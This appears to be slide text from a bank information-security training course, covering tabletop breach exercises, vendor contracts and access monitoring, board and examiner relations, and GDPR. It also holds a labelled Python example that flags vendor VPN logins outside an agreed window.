Tabletop Exercise Development

Tabletop exercise planning

• Real life is messy; the scenario should attempt to mimic that
• Use “injects” and planning spreadsheet (from course materials) to fill in
timeline gaps
• Prepare for hidden agendas or difficult personalities
• Check for “historical events” to ensure you don’t accidentally touch on a
sensitive experience
• Be prepared to “take someone out,” but do it gently!


Tabletop Exercise Development


FOX-14 news crew is setup across the street and reporting
13 12:20 PM
live on noon news.

A customer calls in requesting balance info, and wondering if


he should close his account. But there is no customer on
record with the name he gives. He is angry, tells the bank
14 12:30 PM
employee he is going to come to the <name> Branch right
now and close his account and his money had better be
there.

15 12:40 PM <insert name> calls wanting to know what is really going on.

An employee returning from lunch says there is a TV crew


outside and they asked her some questions. “I didn’t tell
16 12:50 PM them anything! When they asked what the problem was I told
them I had nothing to say about the hackers that got into our
systems!”

Phone call quality issues are continuing to be a problem.


17 1:15 PM More customers are calling in after hearing the news and
10-D Security calls being dropped are occurring more frequently.


Tabletop Exercise Development

You can use handouts to “force” participants to speak, and to
make sure everyone has something to comment on.


Tabletop Exercise Development

Conducting a tabletop exercise

• Review the stated objectives of the exercise
• Go over “assumptions” (e.g., current functions, management,
no wrong/right answers, info provided is accurate, etc.)
• “Rules” of the exercise:
– Don’t get wrapped up in the artificiality
– No “easy” fixes
– Base answers on reality and for the simulated timeframe of exercise
– Enjoy the exercise – participation is key!


Tabletop Exercise Development

A few tips for developing and running an exercise:

• Use humor when possible
• Facilitator should be neutral, and shouldn’t provide answers
• Have a scribe dedicated to taking notes throughout
• Use “head fakes” at start, so major events are a surprise
• Include “noise” and current events to make it “real”
• It’s okay to not have a clean ending
• Food is rarely a bad idea


The Declaration

• Define and document who is authorized to declare a disaster,
especially if there is a third party involved (e.g., outsourced
core, alternate data center, IT service provider, etc.)
• Usually there is a cost to “declare” with a third-party, whether
you actually use the service or not
• Understand what the vendor’s service obligation includes,
especially the committed time to respond
• Before you declare a disaster, you may wish to consider the
level of effort required to “fail back” to normal operations


Tips

• Exercises can be tolerable, and maybe even fun. Permit
casual dress, music, etc. Provide snacks, light meal, etc.
• For advanced exercises, “tag out” personnel to promote
procedure development, cross-training, and to evaluate
pandemic plans.
• Know who your “key personnel” are in advance; you may
need to provide special case support (child care, family care,
hotel, clothing allowance, etc.).


Other Considerations

• Regional events will likely cause higher absenteeism, but may
provide a degree of “grace” for recovery.
• If contingency is isolated to just your organization there will
likely be less “forgiveness” given by the customers and
community.
• Real contingencies will affect people differently; some will
step up and some may withdraw.


Section 8: Vendor Management

Topics:
• Relationship Management
• Expectations of Vendors
• During Out of the Ordinary Events

“Most of what we call management consists of making it difficult for
people to get their work done.”
- Peter Drucker


Vendors – Common Issues

Vendor is unresponsive to audit/exam findings – Some service
providers do not understand or are unwilling to remediate issues.
Response: Your contract is the place to start. Look for language in the
contract that indicates the vendor must adhere to regulatory requirements or
other industry practices. Depending upon the services provided by the
vendor, and the complexity of replacing them, you may end up needing to
research alternatives. In all cases, keep good documentation in case
separation occurs and to be able to show your actions to examiners.


Vendors – Common Issues

Vendor is unwilling/unable to provide information – What do you
do when “Enormous Core Provider” won’t provide you with the configuration
for “your” firewall? Or they refuse to provide information on their latest
external vulnerability assessment?
Response: Again, look in your contract to determine if there is anything
that obligates them to provide the information. If not, you may have little
recourse. However, it is often useful to contact other areas within the vendor
to find an advocate for you (e.g., sales, executive contact, friendly support
manager, etc.). As before, keep documentation as supporting evidence that
you made a reasonable attempt to obtain it.


Vendors – Look Before You Buy

• Is the vendor of the caliber your institution expects/requires?
• Does the vendor have a good reputation for working with other vendors?
• Can the vendor prove their solution integrates with your environment?
• Will the vendor provide the service the bank expects? As an example, will
they provide detailed weekly/monthly reports or on-demand information
requests, or do they say “We’ll tell you what you need to know…”?
• Could they off-shore any of the services? Depending upon the services
involved, it may be worth knowing what, if any, off-shore connections may
exist. Regulations exist covering what customer data can leave the U.S.

Note: See MSP expectations checklist in course materials.


Vendors – Technology Aspects

Breach Notifications – Define:

• Time to notify – How long until vendor must notify bank?
• Contacts – Does the vendor know who to contact?
• Method – Written notifications may be delayed (expect legal reviews).
• Vendor’s vendor breach – Make sure vendor knows they must notify you
even if the breach was at their vendor.


Vendors – Technology Aspects

Miscellaneous:
• Obtain “Summary Exam Reports” from regulator for key vendors
• Increase in contract negotiators, especially for core services
• Include “right to audit” in contracts, or obtain in writing separately
• For critical technology providers, consider performing on-site
reviews
• Set expectations prior to contract signing, while you have leverage


Vendors – Technology Aspects

Miscellaneous:
• Monitor and log vendor access to your network and systems
• IT support vendor shouldn’t perform audits, firewall reviews,
security testing, etc. (“fox watching the hen house”)
• Contract warning signs:
– Tight or restrictive renewal windows for auto-renewing contracts
– No exit clauses
– Deliberately vague language
– Governing Law not in your state
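Added example (not part of the course materials or any vendor's tooling): one way to turn the "monitor and log vendor access" bullet into a repeatable review. It assumes a VPN login log in the constructed format shown in the code; the vendor account names, approved source addresses, maintenance window and ticket format are all placeholders, and the log lines are constructed for the example.

```python
"""Vendor-access review: flag vendor account logins that fall outside the
agreed maintenance window, come from an unexpected source address, or lack
a change-ticket reference.

Assumed input (constructed for this example): syslog-style remote-access
log lines of the form
    <ISO timestamp> vpn login user=<account> src=<ip> ticket=<id|none>
Account names, window and ticket format are placeholders, not real values.
"""
from dataclasses import dataclass
from datetime import datetime, time
import re

# Constructed sample log lines (not real data).
SAMPLE_LOG = """\
2019-03-04T02:15:09 vpn login user=svc-coreprov src=203.0.113.10 ticket=CHG-1042
2019-03-04T14:40:55 vpn login user=svc-coreprov src=203.0.113.10 ticket=none
2019-03-05T03:05:12 vpn login user=svc-msp-support src=198.51.100.7 ticket=CHG-1043
2019-03-05T03:10:40 vpn login user=svc-msp-support src=192.0.2.99 ticket=CHG-1043
2019-03-05T09:12:01 vpn login user=jsmith src=10.0.0.5 ticket=none
"""

# Assumed vendor policy: account -> (approved source IPs, window start, window end).
VENDOR_POLICY = {
    "svc-coreprov": ({"203.0.113.10"}, time(1, 0), time(5, 0)),
    "svc-msp-support": ({"198.51.100.7"}, time(1, 0), time(5, 0)),
}

LINE_RE = re.compile(
    r"^(?P<ts>\S+) vpn login user=(?P<user>\S+) src=(?P<src>\S+) ticket=(?P<ticket>\S+)$"
)


@dataclass
class Finding:
    timestamp: str
    user: str
    reasons: list


def in_window(t: time, start: time, end: time) -> bool:
    """True if t lies in [start, end]; handles windows that wrap past midnight."""
    if start <= end:
        return start <= t <= end
    return t >= start or t <= end


def review_vendor_access(log_text: str) -> list:
    """Return one Finding per vendor login that violates the assumed policy."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a login event in the assumed format
        user = m["user"]
        if user not in VENDOR_POLICY:
            continue  # only vendor accounts are in scope for this review
        allowed_src, start, end = VENDOR_POLICY[user]
        ts = datetime.fromisoformat(m["ts"])
        reasons = []
        if not in_window(ts.time(), start, end):
            reasons.append("outside maintenance window")
        if m["src"] not in allowed_src:
            reasons.append(f"unexpected source {m['src']}")
        if m["ticket"] == "none":
            reasons.append("no change ticket")
        if reasons:
            findings.append(Finding(m["ts"], user, reasons))
    return findings


if __name__ == "__main__":
    for f in review_vendor_access(SAMPLE_LOG):
        print(f.timestamp, f.user, "; ".join(f.reasons))
```

Run against the constructed log, the review reports the afternoon login with no ticket and the login from an address not on the vendor's approved list; the in-window, ticketed logins and the non-vendor account produce nothing. The same structure works for any access log once the line format and policy table are replaced with the institution's own.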


Vendors – Technology Aspects

“It’s not me, it’s YOU…”

• Know what the contract allows for separation of services
• Who owns the data, passwords, source code, etc. after termination?
• Include language in contract that vendor must assist in separation
• Spell out in contract that data must be returned (don’t allow
indefinite storage of customer data in vendor’s archives)
• Ownership of domain registrations, keys, licenses, etc. should all be
defined in the contract (nightmare scenario)


Section 9: Politics
Topics:
• Board
• IT
• Auditors and Examiners
• Do’s and Don’ts
• Other Miscellaneous

“It is said that a fool only learns from his own mistakes, a wise man from the
mistakes of others.”
- Otto von Bismarck (1815-1898)


Board

• If there is not a direct line of responsibility/reporting to the
Board, your messages may be filtered
• Assume regulators will see everything in Board reports
• Determine Board’s tolerance/understanding of IT and InfoSec
– Communicate to their level of understanding, not above.
– If there’s a “technology-aware” Board member, get to know him/her!
– When in doubt, adhere to “The Rule of 3”


IT

• Many variables, especially if you are within the IT reporting
structure.
– Do you have a degree of trust within the organization for concerns to
be heard at the appropriate levels, or are you “filtered?”
– Have you provided security checklists they can use? (server hardening,
new system risk assessment, change request form, InfoSec exceptions)
– Is there a trusted person/group within IT that will provide internal
support?
– Do you have a back-channel person of authority that you can go to
with concerns?
– Do you have an auditor that can bring attention to areas where you’ve
encountered resistance?


Auditors and Examiners

• Develop a checklist for your annual and on-going responsibilities
and review status prior to audit/exam.
• Even if the institution doesn’t have a great relationship with the
external entity, you should make an effort to have a good working
connection.
• Golden Rule at exam/audit time.
• Remember to request Summary Exam Reports for your key vendors.
• Make sure the issue tracking spreadsheet is up to date.


Do’s and Don’ts


• Do Budget
• Do make business cases (with options, including “doing nothing”)
• Do consider customers, operations, IT, others before implementing
significant changes (“Look both ways when crossing a one-way street!”)
• Do document (policies, changes, training, exercises, vendor
interactions, etc.)
• Do “under promise” and “over deliver”
• Do be an educator (not a dictator)
• Don’t be the “Department of NO!”
• Don’t try to impress with knowledge
• Don’t use FUD, but if you do, make it a rarity
• Don’t overreact


Other Miscellaneous

• Have a budget, or work to GET a budget! Track significant security
expenses throughout the year, and build a realistic budget.
• You are responsible for information security, so “live it” and
demonstrate proper work behavior.
• You will, eventually, miss something or make a significant mistake.
If you overreact when other management falls short, they will likely
more-than-reciprocate when you make an error.
• Get included in other areas’ meetings to stay abreast of new
systems, services, functions, etc. It is easier to implement security
the earlier it is introduced in the process.


Other Miscellaneous (or, Welcome to the EU!)

General Data Protection Regulation (GDPR)

• Effective May 2018; you may have to comply regardless of location IF
the institution holds or processes information for a resident of the EU
• Appears to require many security provisions, such as:
– Affirmative consent by the consumer to permit information sharing
– Breach notifications within 72 hours of detection
– Data flow diagrams for customer data
– Right to be forgotten / Right to data portability
– Data Protection Officer (depends on institution’s function and size)
• Unclear how (or IF) enforcement in the U.S. might occur
For details: https://www.eugdpr.org/


Section 10: Wrap-Up


Topics:
• Miscellaneous Information
• Contact Info (optional)
• Questions
• Course Evaluation
• Certificate

“Being the first to cross the finish line makes you a winner in only one phase of
life. It's what you do after you cross the line that really counts.”
- Ralph Boston


Know Where to Get Information

Websites of some value or interest:

• DNSStuff Toolbox http://www.dnsstuff.com/tools
• CVE Details https://www.cvedetails.com/
• TinEye Reverse Image Search https://www.tineye.com/
• Mozilla Observatory https://observatory.mozilla.org/
• PunkSPIDER https://www.punkspider.org/
• The Wayback Machine https://archive.org/web/
• Google Hacking Database https://www.exploit-db.com/google-hacking-database/
• European Union GDPR FAQ https://www.eugdpr.org/gdpr-faqs.html


Know Where to Get Information

And more websites:

• Chronology of Data Breaches https://www.privacyrights.org/data-breaches
• Verizon Data Breach Investigations Report
http://www.verizonenterprise.com/verizon-insights-lab/dbir/
• VirusTotal https://www.virustotal.com/
• Payload Security https://www.hybrid-analysis.com/
• Zabasearch http://www.zabasearch.com
• Sucuri Website Scanner https://sitecheck.sucuri.net/
• Check if your info has been compromised https://haveibeenpwned.com/
• 10-D’s Weekly Security Tip https://10dsecurity.com/weekly-security-tips/


Know Where to Get Information

Some websites to obtain financial info for vendors:

• 451 Research https://451research.com/
• Forrester https://go.forrester.com/
• Gartner http://www.gartner.com
• Google Finance https://finance.google.com/
• IASPlus http://www.iasplus.com/en/resources/ifrs-topics/use-of-ifrs
• IDC http://www.idc.com/
• Morningstar http://financials.morningstar.com/
• Nasdaq http://www.nasdaq.com/
• SEC EDGAR http://www.sec.gov/edgar.shtml
• Yahoo Finance http://finance.yahoo.com/


Search Queries

Try these queries in online search engines (substitute the vendor's name and domain):

• “company_name” “annual report” filetype:pdf
• “company_name” financial report year filetype:pdf
• site:company_domain.com filetype:pdf (or docx or xlsx or pptx)


THANK YOU!!!
